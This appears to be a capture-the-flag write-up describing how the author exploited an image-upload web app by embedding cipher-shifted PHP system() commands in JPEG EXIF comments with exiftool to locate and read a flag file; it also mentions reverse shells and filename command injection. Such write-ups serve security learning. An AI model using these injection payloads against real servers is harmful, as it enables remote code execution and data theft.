The goal of the challenge was to find the flag on the server. As the url was already given in the challenge I decided not make an nmap open port scan. The webapp has very basic functionalities, such as uploading images. There was a hint to use jpeg images, to make life easier:-). Uploading files with an other data type was not possible.
I used a simple cat picture from google images for the upload, to which the response was that file succes.jpeg was not found. A renaming of the upload image to success.jpeg solved the problem and a result is given back from the server with some gibberish data.
It looks like that the upload worked, the next step is to figure out how to get the flag.
At this moment there might be different ways to solve the challenge. One might to try find out where the pictures are saved using a directory bruteforce. Maybe there is a vulnerability in the upload fuction to bypass the file type upload restrictions . If that would be possible one could upload a payload script like a php microshell which would add commands one wants to use to run on the server at the end of the URL and finally also start a reverse shell, etc. Also an interesting way is to Inject Command in the Filename, see here for more details.
An other possiblity is to insert e.g. PHP Code to the image metadata. An jpeg file can store a lot of information along the actual image data. EXIF metadata such as the camera model, decription, comments, etc. By using exiftool, a command line tool for displaying and manipulating exif metadata in various document and image formats, the first try was to modify the “Comment Section” and see if that influences the response from the server.
exiftool -Comment=’ — — — — — ABCDEFG — — — — -’ success.jpegThe response from the server is:
This was a success, as the response reflects the metadata, but it looks like that the input “ABCDEFG” is Caesor Cipher Encoded and represents part of the ciphertext.
Plaintext: mnopqrstuvwxyzabcdefghijkl
Ciphertex: abcdefghijklmnopqrstuvwxyzThe next step is to try to include PHP Code into the Comment Section. As we are trying to find a flag/gold nugget, one of the following commands can be injected in the metadata <?php system(‘find / -name *flag*’); ?> or
<?php system(‘find / -name *nugget’); ?>
# exiftool -Comment=’<?dvd gmghsa(“twbr / -boas *biuush”); ?>’ success.jpegFor more details here is the subsitution and value I used in CyberChef.
And indeed we receive the path to the flag!
Now it is possible to get the content of the file:
‘cat /var/www/html/gold.nugget’
See Cyberchef output here.
exiftool -Comment=’<?dvd gmghsa(“‘qoh /jof/kkk/vhaz/uczr.biuush”); ?>’ success.jpegAnd we receive the hidden text/flag:
This was another interesting upload vulnerability challenge. There exist so many kind of upload vulnerabilities, it is also a topic quit common on CTFs. Depending on the give circumstances it might be possible to bypass the data type filtering and get a reverse shell or find other open ports. It is not always easy to find out what might be the best and fastest way. That might come with more experience.
Any feedback (good or bad) is much appreciated.
